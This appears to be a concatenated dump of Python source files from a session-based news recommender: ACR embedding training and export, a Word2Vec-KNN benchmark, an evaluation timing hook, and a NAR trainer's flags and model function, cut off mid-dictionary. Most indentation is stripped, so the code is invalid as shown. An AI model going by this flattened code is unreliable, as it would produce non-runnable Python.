print("df new : {}".format(len(articles_metadata_df)))
frames = [articles_metadata_df_load, articles_metadata_df]
articles_metadata_df = pd.concat(frames)
articles_metadata_df = articles_metadata_df.reset_index()
articles_metadata_df = articles_metadata_df.drop(columns='index')
# articles_metadata_df = articles_metadata_df.set_index('article_id')
# append content_art_embeding
print("load matrix : {}".format(len(content_article_embeddings_load)))
print("df new : {}".format(len(content_article_embeddings)))
content_article_embeddings = content_article_embeddings[1:]
content_article_embeddings =np.concatenate((content_article_embeddings_load, content_article_embeddings), axis=0)
output_path = path + "acr_articles_metadata_embeddings.pickle"
tf.logging.info('Exporting ACR Label Encoders, Article metadata and embeddings to {}'.format(output_path))
to_serialize = (acr_label_encoders, articles_metadata_df, content_article_embeddings)
serialize(output_path, to_serialize)
def save_to_mysql_database(mysql_host, mysql_user, mysql_passwd, mysql_database, acr_label_encoders,
articles_metadata_df, content_article_embeddings):
    '''
    - Assumes the target database and table have already been created.
    '''
mydb = mysql.connector.connect(
host=mysql_host,
user=mysql_user,
passwd=<PASSWORD>,
database=mysql_database
)
mycursor = mydb.cursor()
sql = "INSERT INTO customers (news_id, news_id_encode, word_embedding) VALUES (%s, %s, %s)"
tupel = ()
# for i in range(0, len(acr_label_encoders[0]['article_id'])):
# tupel = tupel + (list(acr_label_encoders[0]['article_id'].keys())[i], list(acr_label_encoders[0]['article_id'].values())[i], list(aa[2][i]))
mycursor.execute(sql, tupel)
mydb.commit()
from datetime import datetime
# GET CURRENT TIME
def get_date_time_current():
now = datetime.now()
timestamp = int(datetime.timestamp(now))
return str(timestamp)
# SUBTRACT TIME
def subtract_month(current_time):
from datetime import datetime
dt_object = datetime.fromtimestamp(int(current_time))
a = dt_object.strftime('%Y-%m-%d')
import datetime
import dateutil.relativedelta
d = datetime.datetime.strptime(a, "%Y-%m-%d")
d2 = d - dateutil.relativedelta.relativedelta(days=7)
# print(d2)
from datetime import datetime
timestamp = datetime.timestamp(d2)
return int(timestamp)
# REMOVE PICKLE
parameter = load_json_config("./parameter.json")
def remove_acr_pickle(path_file):
acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = deserialize(path_file)
def serialize(filename, obj):
# with open(filename, 'wb') as handle:
with tf.gfile.Open(filename, 'wb') as handle:
pickle.dump(obj, handle)
def merge_two_dicts(x, y):
return {**x, **y}
# articles_metadata_df = articles_metadata_df[
# articles_metadata_df['created_at_ts'] >= subtract_month(get_date_time_current())]
lena = 600
# acr_label_encoders
a = acr_label_encoders["article_id"]
a = merge_two_dicts({"<PAD>": 0}, dict(list(a.items())[-lena:]))
acr_label_encoders["article_id"] = a
list_key = list(acr_label_encoders["article_id"].keys())
list_value = list(range(len(list_key)))
acr_label_encoders["article_id"] = dict(zip(list_key, list_value))
# df
list_value = list_value[1:]
articles_metadata_df = articles_metadata_df[-lena:]
articles_metadata_df['article_id'] = list_value
# matrix
matrix = np.insert(content_article_embeddings_matrix[-lena:], 0, content_article_embeddings_matrix[0], axis=0)
to_serialize = (acr_label_encoders, articles_metadata_df, matrix)
# creat folder acr predict
dir = "/pickles/acr_articles_metadata_embeddings_predict/"
DATA_DIR = parameter["DATA_DIR"]
path_predict = DATA_DIR + dir
from os import path
if path.exists(path_predict):
pass
else:
os.makedirs(path_predict)
serialize(path_predict+"acr_articles_metadata_embeddings_predict.pickle", to_serialize)
def main_acr_train():
# def main(unused_argv):
# try:
print("<=== STARTING ARC TRAINING ===>")
parameter = load_json_config("./parameter.json")
list_args = parameter["acr_training"]
DATA_DIR = parameter["DATA_DIR"]
model_dir = DATA_DIR + list_args["model_dir"]
train_set_path_regex = DATA_DIR + list_args["train_set_path_regex"]
input_word_vocab_embeddings_path = DATA_DIR + list_args["input_word_vocab_embeddings_path"]
input_label_encoders_path = DATA_DIR + list_args["input_label_encoders_path"]
output_acr_metadata_embeddings_path = DATA_DIR + list_args["output_acr_metadata_embeddings_path"]
batch_size = list_args["batch_size"]
truncate_tokens_length = list_args["truncate_tokens_length"]
training_epochs = list_args["training_epochs"]
learning_rate = list_args["learning_rate"]
dropout_keep_prob = list_args["dropout_keep_prob"]
l2_reg_lambda = list_args["l2_reg_lambda"]
text_feature_extractor = list_args["text_feature_extractor"]
training_task = list_args["training_task"]
cnn_filter_sizes = list_args["cnn_filter_sizes"]
cnn_num_filters = list_args["cnn_num_filters"]
rnn_units = list_args["rnn_units"]
rnn_layers = list_args["rnn_layers"]
rnn_direction = list_args["rnn_direction"]
acr_embeddings_size = list_args["acr_embeddings_size"]
# mysql_host = list_args["mysql_host"]
# mysql_user = list_args["mysql_user"]
# mysql_passwd = list_args["mysql_passwd"]
# mysql_database = list_args["mysql_database"]
# Capture whether it will be a single training job or a hyper parameter tuning job.
tf_config_env = json.loads(os.environ.get('TF_CONFIG', '{}'))
task_data = tf_config_env.get('task') or {'type': 'master', 'index': 0}
trial = task_data.get('trial')
running_on_mlengine = (len(tf_config_env) > 0)
tf.logging.info('Running {}'.format('on Google ML Engine' if running_on_mlengine else 'on a server/machine'))
#Disabling duplicate logs on console when running locally
logging.getLogger('tensorflow').propagate = running_on_mlengine
start_train = time()
tf.logging.info('Starting training job')
model_output_dir = model_dir
if trial is not None:
model_output_dir = os.path.join(model_output_dir, trial)
tf.logging.info(
"Hyperparameter Tuning - Trial {}. model_dir = {}".format(trial, model_output_dir))
else:
tf.logging.info('Saving model outputs to {}'.format(model_output_dir))
tf.logging.info('Loading ACR preprocessing assets')
# check exist path
if path.exists(model_output_dir):
pass
else:
os.makedirs(model_output_dir)
if path.exists(output_acr_metadata_embeddings_path):
pass
else:
os.makedirs(output_acr_metadata_embeddings_path)
print("Loading ACR preprocessing assets....")
print(input_label_encoders_path)
print(output_acr_metadata_embeddings_path)
file_lable_encode = get_all_file(input_label_encoders_path)[0]
file_word_embedding = get_all_file(input_word_vocab_embeddings_path)[0]
# current_time = split_date(file_lable_encode)
# print(current_time)
# load file with max date
acr_label_encoders, labels_class_weights, word_embeddings_matrix = \
load_acr_preprocessing_assets(file_lable_encode,file_word_embedding)
features_config = get_session_features_config(acr_label_encoders)
#input_tfrecords = os.path.join(FLAGS.data_dir, FLAGS.train_set_path_regex)
input_tfrecords = train_set_path_regex
tf.logging.info('Defining input data (TFRecords): {}'.format(input_tfrecords))
    #Creating an embedding for a special token to initiate decoding of the RNN autoencoder
special_token_embedding_vector = np.random.uniform(low=-0.04, high=0.04,
size=[1,word_embeddings_matrix.shape[1]])
# train_files = get_listmax_date(get_all_file(train_set_path_regex))
train_files = get_all_file(train_set_path_regex)
print(train_files)
if len(os.listdir(model_dir)) == 0: #acr_model not exist
print("NO Have ACR Module")
acr_model = build_acr_estimator(model_output_dir,
word_embeddings_matrix,
features_config,
labels_class_weights,
special_token_embedding_vector, list_args)
tf.logging.info('Training model')
acr_model.train(input_fn=lambda: prepare_dataset(files=train_files,
features_config=features_config,
batch_size=batch_size,
epochs=training_epochs,
shuffle_dataset=True,
shuffle_buffer_size=10000))
else: #acr_model exist
print("Have ACR Module")
acr_model = build_acr_estimator(model_output_dir,
word_embeddings_matrix,
features_config,
labels_class_weights,
special_token_embedding_vector, list_args)
        #The objective is to overfit this network, so that the ACR embeddings represent the article content well
tf.logging.info('Evaluating model - TRAIN SET')
print("Evaluating model - TRAIN SET")
eval_results = acr_model.evaluate(input_fn=lambda: prepare_dataset(files=train_files,
features_config=features_config,
batch_size=batch_size,
epochs=1,
shuffle_dataset=False))
tf.logging.info('Evaluation results with TRAIN SET (objective is to overfit): {}'.format(eval_results))
'''
tf.logging.info('Evaluating model - TEST SET')
eval_results = acr_model.evaluate(input_fn=lambda: prepare_dataset(files=test_files,
features_config=features_config,
batch_size=FLAGS.batch_size,
epochs=1,
shuffle_dataset=False))
tf.logging.info('Evaluation results with TEST SET: {}'.format(eval_results))
'''
tf.logging.info('Predicting ACR embeddings')
print("Predicting ACR embeddings")
article_metadata_with_pred_embeddings = acr_model.predict(input_fn=lambda: prepare_dataset(files=train_files,
features_config=features_config,
batch_size=batch_size,
epochs=1,
shuffle_dataset=False))
articles_metadata_df, content_article_embeddings = get_articles_metadata_embeddings(article_metadata_with_pred_embeddings)
tf.logging.info('Generated ACR embeddings: {}'.format(content_article_embeddings.shape))
# read csv preprocessed by acr preprocessing
list_args2 = parameter["acr_preprocess"]
path_csv = DATA_DIR + list_args2['output_articles_csv_path_preprocessed']
df = pd.read_csv(get_all_file(path_csv)[0])
print(len(df['id']))
export_acr_metadata_embeddings_with_datetime(df, acr_label_encoders, articles_metadata_df, content_article_embeddings, output_acr_metadata_embeddings_path)
print("Export done, Call load acr auto ...")
print("Remove acr embedding")
remove_acr_pickle(get_all_file(output_acr_metadata_embeddings_path)[0])
    # TODO: call the service to load acr_label_encoders, articles_metadata_df, content_article_embeddings into the singleton variable
# import requests
# resp = requests.get('http://0.0.0.0:8082/loadacr')
# if resp.status_code == 200:
# print("Called load acr_pickle")
# else:
# print("Not Yet call load acr_pickle")
# save_to_mysql_database( mysql_host, mysql_user, mysql_passwd, mysql_database, acr_label_encoders,articles_metadata_df , content_article_embeddings)
# after trainning, delete all file tfrecord
delete_all_file_in_path(train_set_path_regex)
log_elapsed_time(start_train, 'Finalized TRAINING')
print("<=== END ARC TRAINING ===>")
# except Exception as ex:
# tf.logging.error('ERROR: {}'.format(ex))
# raise
if __name__ == '__main__':
tf.app.run()
```
#### File: nar/benchmarks/w2v_knn.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import os
import numpy as np
from gensim.models import Word2Vec
from gensim.models.callbacks import CallbackAny2Vec
from tqdm import tqdm
from .benchmarks import BenchmarkRecommender
from ..utils import max_n_sparse_indexes
import pandas as pd
class EpochLogger(CallbackAny2Vec):
'''Callback to log information about training'''
def __init__(self, total_epoch):
self.epoch = 0
self.bar = tqdm(total=total_epoch)
def on_epoch_begin(self, model):
pass
def on_epoch_end(self, model):
self.epoch += 1
self.bar.update(1)
class Word2VecKNN(BenchmarkRecommender):
def __init__(self, clicked_items_state, params, eval_streaming_metrics):
super().__init__(clicked_items_state, params, eval_streaming_metrics)
total_epoch = params["total_epoch"]
window = params["window"]
embedded_size = params["embedded_size"]
self.iter = 0
self.epoch = total_epoch
self.model = Word2Vec(size=embedded_size, window=window, min_count=1,
workers=int(multiprocessing.cpu_count() * 0.8),
sg=1, iter=total_epoch, callbacks=(), compute_loss=True)
def get_clf_suffix(self):
return 'w2v_knn'
def get_description(self):
return 'Word2Vec-KNN: Most similar items sessions based on normalized cosine similarity between session ' \
'co-occurrence learned using Word2Vec'
def get_all_sessions_clicks(self, sessions_items, sessions_next_items):
sessions_all_items_but_last = list([list(filter(lambda x: x != 0, session)) for session in sessions_items])
sessions_last_item_clicked = list(
[list(filter(lambda x: x != 0, session))[-1] for session in sessions_next_items])
sessions_all_clicks = [previous_items + [last_item] \
for previous_items, last_item in
zip(sessions_all_items_but_last, sessions_last_item_clicked)]
return sessions_all_clicks
def get_sentences(self, sessions_ids, sessions_items, sessions_next_items):
all_session_click = self.get_all_sessions_clicks(sessions_items, sessions_next_items)
all_session_click = [list(map(str, session)) for session in all_session_click]
return all_session_click
def build_sentences(self, recent_click):
df = pd.DataFrame({"item": recent_click[:,0], "session": recent_click[:,1]})
df = df.groupby(["session"])["item"].apply(list)
return df.tolist()
def train(self, users_ids, sessions_ids, sessions_items, sessions_next_items):
self.train_model(self.get_sentences(sessions_ids, sessions_items, sessions_next_items))
def train_model(self, sentences):
update = False if self.iter == 0 else True
self.model.build_vocab(sentences=sentences, update=update)
self.model.train(sentences=sentences, total_examples=len(sentences), epochs=self.epoch)
self.iter += 1
# print("knn iter=", self.iter)
# print(self.model.wv.vectors.shape[0])
def predict(self, users_ids, sessions_items, topk=5, valid_items=None):
print("Predicting")
session_predictions = np.zeros(dtype=np.int64,
shape=[sessions_items.shape[0],
sessions_items.shape[1],
topk])
for row_idx, session_items in enumerate(sessions_items):
s_item = []
for col_idx, item in enumerate(session_items):
if item != 0:
item = str(item)
if item in self.model.wv:
s_item.append(item)
if len(s_item) == 0:
preds = []
else:
# Sorts items its score
similar_list = self.model.wv.most_similar(positive=s_item, topn=self.model.wv.vectors.shape[0])
preds = [int(item) for item, score in similar_list]
# print(preds)
session_predictions[row_idx, col_idx] = list(
self._get_top_n_valid_items(preds, topk, valid_items[row_idx, col_idx]))
return session_predictions
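
# Hedged usage sketch (added commentary; constructor arguments follow __init__ above,
# the concrete values here are illustrative only):
#
#   rec = Word2VecKNN(clicked_items_state, params={"total_epoch": 5, "window": 3,
#                                                  "embedded_size": 64},
#                     eval_streaming_metrics={})
#   rec.train_model([["12", "34", "56"], ["34", "56", "78"]])  # sessions as item-id strings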
```
#### File: nar_module/nar/eval_hook.py
```python
import time
import tensorflow as tf
import numpy as np
class EvalHook(tf.train.SessionRunHook):
def __init__(self):
super().__init__()
self.begin_ts = None
self.all_pred_time = None
def begin(self):
self.all_pred_time = []
def before_run(self, run_context):
self.begin_ts = time.time()
def after_run(self, run_context, run_values):
run_time = time.time() - self.begin_ts
self.all_pred_time.append(run_time)
def end(self, session):
all_pred_time = np.array(self.all_pred_time, dtype=np.float)
print("Min, max, avg %f - %f - %f" % (np.min(all_pred_time), np.max(all_pred_time), np.average(all_pred_time)))
print("Total %d, took %d " % (len(all_pred_time), np.sum(all_pred_time)))
self.all_pred_time = None
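
# Hedged usage note (added commentary): as a tf.train.SessionRunHook this can be
# attached to an Estimator call to time each run step, e.g.
#   estimator.evaluate(input_fn=..., hooks=[EvalHook()])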
```
#### File: nar_module/nar/nar_trainer_cafebiz_full.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
#Disabling GPU for local execution
#import os
#os.environ["CUDA_VISIBLE_DEVICES"]="-1"
from time import time
import tensorflow as tf
import json
import os
import numpy as np
import tempfile
import logging
import shutil
from acr_module.acr.acr_module_service import load_json_config
from pick_singleton.pick_singleton import ACR_Pickle_Singleton, NAR_Pickle_Singleton
from redis_connector.RedisClient import Singleton
from .utils import resolve_files, chunks, log_elapsed_time, append_lines_to_text_file, min_max_scale, get_current_time
from .datasets import prepare_dataset_iterator, prepare_dataset_generator_predict, parse_sequence_example_predict
from .nar_model import ClickedItemsState, ItemsStateUpdaterHook, NARModuleModel,get_list_id, get_tf_dtype
from .benchmarks import RecentlyPopularRecommender, ContentBasedRecommender, ItemCooccurrenceRecommender, ItemKNNRecommender, SessionBasedKNNRecommender, SequentialRulesRecommender
from .nar_utils import load_acr_module_resources, load_nar_module_preprocessing_resources, save_eval_benchmark_metrics_csv, \
upload_model_output_to_gcs, dowload_model_output_from_gcs
import glob
tf.logging.set_verbosity(tf.logging.INFO)
#Making results reproducible
RANDOM_SEED=42
np.random.seed(RANDOM_SEED)
#Model params
tf.flags.DEFINE_integer('batch_size', default=64, help='Batch size')
tf.flags.DEFINE_integer('truncate_session_length', default=20, help='Truncate long sessions to this max. size')
tf.flags.DEFINE_float('learning_rate', default=1e-3, help='Learning rate')
tf.flags.DEFINE_float('dropout_keep_prob', default=1.0, help='Dropout (keep prob.)')
tf.flags.DEFINE_float('reg_l2', default=0.0001, help='L2 regularization')
tf.flags.DEFINE_float('softmax_temperature', default=0.2, help='Initial value for temperature for softmax')
tf.flags.DEFINE_float('recent_clicks_buffer_hours', default=1.0, help='Number of hours that will be kept in the recent clicks buffer (limited by recent_clicks_buffer_max_size)')
tf.flags.DEFINE_integer('recent_clicks_buffer_max_size', default=6000, help='Maximum size of recent clicks buffer')
tf.flags.DEFINE_integer('recent_clicks_for_normalization', default=2500, help='Number of recent clicks used to normalize the recency and popularity (novelty) dynamic features')
tf.flags.DEFINE_integer('eval_metrics_top_n', default=100, help='Eval. metrics Top N')
tf.flags.DEFINE_integer('CAR_embedding_size', default=1024, help='CAR submodule embedding size')
tf.flags.DEFINE_integer('rnn_units', default=10, help='Number of units of RNN cell')
tf.flags.DEFINE_integer('rnn_num_layers', default=1, help='Number of RNN layers')
tf.flags.DEFINE_integer('train_total_negative_samples', default=7, help='Total negative samples for training')
tf.flags.DEFINE_integer('train_negative_samples_from_buffer', default=10, help='Training Negative samples from recent clicks buffer')
tf.flags.DEFINE_integer('eval_total_negative_samples', default=600, help='Total negative samples for evaluation')
tf.flags.DEFINE_integer('eval_negative_samples_from_buffer', default=5000, help='Eval. Negative samples from recent clicks buffer')
tf.flags.DEFINE_bool('save_histograms', default=False, help='Save histograms to view on Tensorboard (make job slower)')
tf.flags.DEFINE_bool('disable_eval_benchmarks', default=True, help='Disable eval benchmarks')
tf.flags.DEFINE_bool('eval_metrics_by_session_position', default=False, help='Computes eval metrics at each position within session (e.g. 1st click, 2nd click)')
tf.flags.DEFINE_float('novelty_reg_factor', default=0.0, help='Popularity Regularization Loss (e.g. 0.1, 0.2, 0.3)')
tf.flags.DEFINE_float('diversity_reg_factor', default=0.0, help='Diversity (similarity) Regularization Loss (e.g. 0.1, 0.2, 0.3)')
tf.flags.DEFINE_float('eval_negative_sample_relevance', default=0.1, help='Relevance of negative samples within top-n recommended items for evaluation (relevance of positive sample is always 1.0)')
tf.flags.DEFINE_string('current_time', default=get_current_time(), help='get current running time for save top-n recommendation')
tf.flags.DEFINE_bool('save_eval_per_sessions', default=False, help='Save the last batch evaluation for each hour of training sessions')
tf.flags.DEFINE_list('enabled_clicks_input_features_groups',
default='time,location', help='Groups of input contextual features for user clicks, separated by comma. Valid values: ALL,NONE,time,device,location,referrer')
tf.flags.DEFINE_list('enabled_articles_input_features_groups',
default='category', help='Groups of input metadata features for articles, separated by comma. Valid values: ALL,NONE,category,author')
tf.flags.DEFINE_list('enabled_internal_features',
default='recency,novelty,article_content_embeddings', help='Internal features. Valid values: ALL,NONE,recency,novelty,article_content_embeddings,item_clicked_embeddings')
#Control params
#tf.flags.DEFINE_string('data_dir', default_value='./tmp',
# help='Directory where the dataset is located')
tf.flags.DEFINE_string('train_set_path_regex',
default='/train*.tfrecord', help='Train set regex')
tf.flags.DEFINE_string('acr_module_resources_path',
default='/pickles', help='ACR module resources path')
tf.flags.DEFINE_string('nar_module_preprocessing_resources_path',
default='/pickles', help='NAR module preprocessing resources path')
tf.flags.DEFINE_string('model_dir', default='./tmp',
help='Directory where save model checkpoints')
tf.flags.DEFINE_string('warmup_model_dir', default=None,
help='Directory where model checkpoints of a previous job were output, to warm start this network training')
tf.flags.DEFINE_integer('train_files_from', default=0, help='Train model starting from file N')
tf.flags.DEFINE_integer('train_files_up_to', default=100, help='Train model up to file N')
tf.flags.DEFINE_integer('training_hours_for_each_eval', default=5, help='Train model for N hours before evaluation of the next hour')
tf.flags.DEFINE_integer('save_results_each_n_evals', default=5, help='Saves to disk and uploads to GCS (ML Engine) the incremental evaluation results each N evaluations')
tf.flags.DEFINE_bool('save_eval_sessions_negative_samples', default=False, help='Save negative samples of each session during evaluation')
tf.flags.DEFINE_bool('save_eval_sessions_recommendations', default=False, help='Save CHAMELEON recommendations log during evaluation')
tf.flags.DEFINE_bool('use_local_cache_model_dir', default=False, help='Persists checkpoints and events in a local temp file, copying to GCS at the end of the process (useful for ML Engine jobs, because saving and loading checkpoints slows the training job)')
#Default param used by ML Engine to validate whether the path exists
tf.flags.DEFINE_string('job-dir', default='./tmp', help='Job dir to save staging files')
tf.flags.DEFINE_bool('prediction_only', default=False, help='Experimental prediction only mode')
FLAGS = tf.flags.FLAGS
#params_dict = tf.app.flags.FLAGS.flag_values_dict()
#tf.logging.info('PARAMS: {}'.format(json.dumps(params_dict)))
ALL_FEATURES = 'ALL'
def get_articles_features_config(acr_label_encoders):
articles_features_config = {
#Required fields
'article_id': {'type': 'categorical', 'dtype': 'int'},
'created_at_ts': {'type': 'numerical', 'dtype': 'int'},
#Additional metadata fields
'category0': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 41},
# 'category1': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 128},
# 'author': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 112},
}
feature_groups = {
'category': ['category0'],
# 'category': ['category0', 'category1'],
# 'author': ['author'],
}
#Disabling optional features when required
if FLAGS.enabled_articles_input_features_groups != [ALL_FEATURES]:
for feature_group in feature_groups:
if feature_group not in FLAGS.enabled_articles_input_features_groups:
for feature in feature_groups[feature_group]:
del articles_features_config[feature]
#Adding cardinality to categorical features
for feature_name in articles_features_config:
if feature_name in acr_label_encoders and articles_features_config[feature_name]['type'] == 'categorical':
articles_features_config[feature_name]['cardinality'] = len(acr_label_encoders[feature_name])
# tf.logging.info('Article Features: {}'.format(articles_features_config))
return articles_features_config
def process_articles_metadata(articles_metadata_df, articles_features_config):
articles_metadata = {}
for feature_name in articles_features_config:
articles_metadata[feature_name] = articles_metadata_df[feature_name].values
#Appending a row in the first position to correspond to the <PAD> article #
# (so that it correspond to content_article_embeddings_matrix.shape[0])
articles_metadata[feature_name] = np.hstack([[0], articles_metadata[feature_name]])
return articles_metadata
def get_session_features_config(nar_label_encoders_dict):
session_features_config = {
'single_features': {
#Control features
'user_id': {'type': 'categorical', 'dtype': 'bytes'},
'session_id': {'type': 'numerical', 'dtype': 'int'},
'session_size': {'type': 'numerical', 'dtype': 'int'},
'session_start': {'type': 'numerical', 'dtype': 'int'},
},
'sequence_features': {
#Required sequence features
'event_timestamp': {'type': 'numerical', 'dtype': 'int'},
'item_clicked': {'type': 'categorical', 'dtype': 'int'},#, 'cardinality': 72933},
#Location
'city': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 1022},
# 'region': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 237},
# 'country': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 70},
#Device
# 'device': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 5},
'os': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 10},
#Time
'local_hour_sin': {'type': 'numerical', 'dtype': 'float'},
'local_hour_cos': {'type': 'numerical', 'dtype': 'float'},
'weekday': {'type': 'numerical', 'dtype': 'float'},
#Referrer type
# 'referrer_class': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 7}}}
}
}
feature_groups = {
'time': ['local_hour_sin', 'local_hour_cos', 'weekday'],
'device': ['os'],
'location': ['city'],
'referrer': []
# 'device': ['device', 'os'],
# 'location': ['country', 'region', 'city'],
# 'referrer': ['referrer_class']
}
#Disabling optional features when required
if FLAGS.enabled_clicks_input_features_groups != [ALL_FEATURES]:
for feature_group in feature_groups:
if feature_group not in FLAGS.enabled_clicks_input_features_groups:
for feature in feature_groups[feature_group]:
del session_features_config['sequence_features'][feature]
#Adding cardinality to categorical features
for feature_groups_key in session_features_config:
features_group_config = session_features_config[feature_groups_key]
for feature_name in features_group_config:
if feature_name in nar_label_encoders_dict and features_group_config[feature_name]['type'] == 'categorical':
features_group_config[feature_name]['cardinality'] = len(nar_label_encoders_dict[feature_name])
# tf.logging.info('Session Features: {}'.format(session_features_config))
return session_features_config
def get_internal_enabled_features_config():
VALID_INTERNAL_FEATURES = ['recency','novelty','article_content_embeddings','item_clicked_embeddings']
internal_features_config = {}
enabled_features = []
if FLAGS.enabled_internal_features == [ALL_FEATURES]:
enabled_features = set(VALID_INTERNAL_FEATURES)
else:
enabled_features = set(FLAGS.enabled_internal_features).intersection(set(VALID_INTERNAL_FEATURES))
for feature in VALID_INTERNAL_FEATURES:
internal_features_config[feature] = (feature in enabled_features)
tf.logging.info('Enabled internal features: {}'.format(enabled_features))
return internal_features_config
def nar_module_model_fn(features, labels, mode, params):
if mode == tf.estimator.ModeKeys.TRAIN:
negative_samples = params['train_total_negative_samples']
negative_sample_from_buffer = params['train_negative_samples_from_buffer']
elif mode == tf.estimator.ModeKeys.EVAL:
negative_samples = params['eval_total_negative_samples']
negative_sample_from_buffer = params['eval_negative_samples_from_buffer']
elif mode == tf.estimator.ModeKeys.PREDICT:
negative_samples = params['eval_total_negative_samples']
negative_sample_from_buffer = params['eval_negative_samples_from_buffer']
dropout_keep_prob = params['dropout_keep_prob'] if mode == tf.estimator.ModeKeys.TRAIN else 1.0
internal_features_config = get_internal_enabled_features_config()
eval_metrics_top_n = params['eval_metrics_top_n']
model = NARModuleModel(mode, features, labels,
session_features_config=params['session_features_config'],
articles_features_config=params['articles_features_config'],
batch_size=params['batch_size'],
lr=params['lr'],
keep_prob=dropout_keep_prob,
negative_samples=negative_samples,
negative_sample_from_buffer=negative_sample_from_buffer,
reg_weight_decay=params['reg_weight_decay'],
softmax_temperature=params['softmax_temperature'],
articles_metadata=params['articles_metadata'],
content_article_embeddings_matrix=params['content_article_embeddings_matrix'],
recent_clicks_buffer_hours=params['recent_clicks_buffer_hours'],
recent_clicks_buffer_max_size=params['recent_clicks_buffer_max_size'],
recent_clicks_for_normalization=params['recent_clicks_for_normalization'],
CAR_embedding_size=params['CAR_embedding_size'],
rnn_units=params['rnn_units'],
# metrics_top_n=100,
metrics_top_n=eval_metrics_top_n,
plot_histograms=params['save_histograms'],
novelty_reg_factor=params['novelty_reg_factor'],
diversity_reg_factor=params['diversity_reg_factor'],
internal_features_config=internal_features_config
)
#Using these variables as global so that they persist across different train and eval
global clicked_items_state, eval_sessions_metrics_log, sessions_negative_items_log
eval_benchmark_classifiers = []
if not FLAGS.disable_eval_benchmarks:
eval_benchmark_classifiers=[
#{'recommender': Word2VecKNN, 'params': {"total_epoch": 100, "window": 5, "embedded_size":300}},
{'recommender': RecentlyPopularRecommender, 'params': {}},
{'recommender': ItemCooccurrenceRecommender, 'params': {}},
{'recommender': ItemKNNRecommender,
'params': {'reg_lambda': 20, #Regularization. Discounts the similarity of rare items (incidental co-occurrences).
'alpha': 0.5 #Balance between normalizing with the supports of the two items. 0.5 gives cosine similarity, 1.0 gives confidence (as in association rules).
}},
{'recommender': SessionBasedKNNRecommender,
'params': {'sessions_buffer_size': 3000, #Buffer size of last processed sessions
'candidate_sessions_sample_size': 2000, #200, #Number of candidate near sessions to sample
'sampling_strategy': 'recent', #(recent,random)
'nearest_neighbor_session_for_scoring': 500, #50 #Nearest neighbors to compute item scores
'similarity': 'cosine', #(jaccard, cosine)
'first_session_clicks_decay': 'div' #Decays weight of first user clicks in active session when finding neighbor sessions (same, div, linear, log, quadratic)
}},
{'recommender': ContentBasedRecommender,
'params': {'articles_metadata': params['articles_metadata'],
'content_article_embeddings_matrix': params['content_article_embeddings_matrix']}},
{'recommender': SequentialRulesRecommender,
'params': {'max_clicks_dist': 10, #Max number of clicks to walk back in the session from the currently viewed item. (Default value: 10)
'dist_between_clicks_decay': 'div' #Decay function for distance between two item clicks within a session (linear, same, div, log, quadratic). (Default value: div)
}}
]
hooks = [ItemsStateUpdaterHook(mode, model,
eval_metrics_top_n=eval_metrics_top_n,
clicked_items_state=clicked_items_state,
eval_sessions_metrics_log=eval_sessions_metrics_log,
sessions_negative_items_log=sessions_negative_items_log,
sessions_chameleon_recommendations_log=sessions_chameleon_recommendations_log,
content_article_embeddings_matrix=params['content_article_embeddings_matrix'],
articles_metadata=params['articles_metadata'],
eval_negative_sample_relevance=params['eval_negative_sample_relevance'],
global_eval_hour_id=global_eval_hour_id,
eval_benchmark_classifiers=eval_benchmark_classifiers,
eval_metrics_by_session_position=params['eval_metrics_by_session_position']
)]
if mode == tf.estimator.ModeKeys.TRAIN:
return tf.estimator.EstimatorSpec(mode, loss=model.total_loss, train_op=model.train,
training_chief_hooks=hooks)
elif mode == tf.estimator.ModeKeys.EVAL:
eval_metrics = {#'hitrate_at_1': (model.next_item_accuracy_at_1, model.next_item_accuracy_at_1_update_op),
'hitrate_at_n': (model.recall_at_n, model.recall_at_n_update_op),
'mrr_at_n': (model.mrr, model.mrr_update_op),
#'ndcg_at_n': (model.ndcg_at_n_mean, model.ndcg_at_n_mean_update_op),
}
return tf.estimator.EstimatorSpec(mode, loss=model.total_loss, eval_metric_ops=eval_metrics,
evaluation_hooks=hooks)
elif mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode,predictions=model.predictions,prediction_hooks=hooks)
def build_estimator(model_dir,
content_article_embeddings_matrix,
articles_metadata, articles_features_config,
session_features_config):
"""Build an estimator appropriate for the given model type."""
#Disabling GPU (memory issues on local machine)
#config_proto = tf.ConfigProto(device_count={'GPU': 0})
run_config = tf.estimator.RunConfig(tf_random_seed=RANDOM_SEED,
keep_checkpoint_max=1,
save_checkpoints_secs=1200,
save_summary_steps=100,
log_step_count_steps=100,
#session_config=config_proto
)
estimator = tf.estimator.Estimator(
config=run_config,
model_dir=model_dir,
model_fn=nar_module_model_fn,
params={
'batch_size': FLAGS.batch_size,
'lr': FLAGS.learning_rate,
'dropout_keep_prob': FLAGS.dropout_keep_prob,
'reg_weight_decay': FLAGS.reg_l2,
'recent_clicks_buffer_hours': FLAGS.recent_clicks_buffer_hours,
'recent_clicks_buffer_max_size': FLAGS.recent_clicks_buffer_max_size,
'recent_clicks_for_normalization': FLAGS.recent_clicks_for_normalization,
'eval_metrics_top_n': FLAGS.eval_metrics_top_n,
'CAR_embedding_size': FLAGS.CAR_embedding_size,
'rnn_units': FLAGS.rnn_units,
'train_total_negative_samples': FLAGS.train_total_negative_samples,
'train_negative_samples_from_buffer': FLAGS.train_negative_samples_from_buffer,
'eval_total_negative_samples': FLAGS.eval_total_negative_samples,
'eval_negative_samples_from_buffer': FLAGS.eval_negative_samples_from_buffer,
'softmax_temperature': FLAGS.softmax_temperature,
'save_histograms': FLAGS.save_histograms,
'eval_metrics_by_session_position': FLAGS.eval_metrics_by_session_position,
'novelty_reg_factor': FLAGS.novelty_reg_factor,
'diversity_reg_factor': FLAGS.diversity_reg_factor,
'eval_negative_sample_relevance': FLAGS.eval_negative_sample_relevance,
#From pre-processing
'session_features_config': session_features_config,
'articles_features_config': articles_features_config,
'articles_metadata': articles_metadata,
#From ACR module
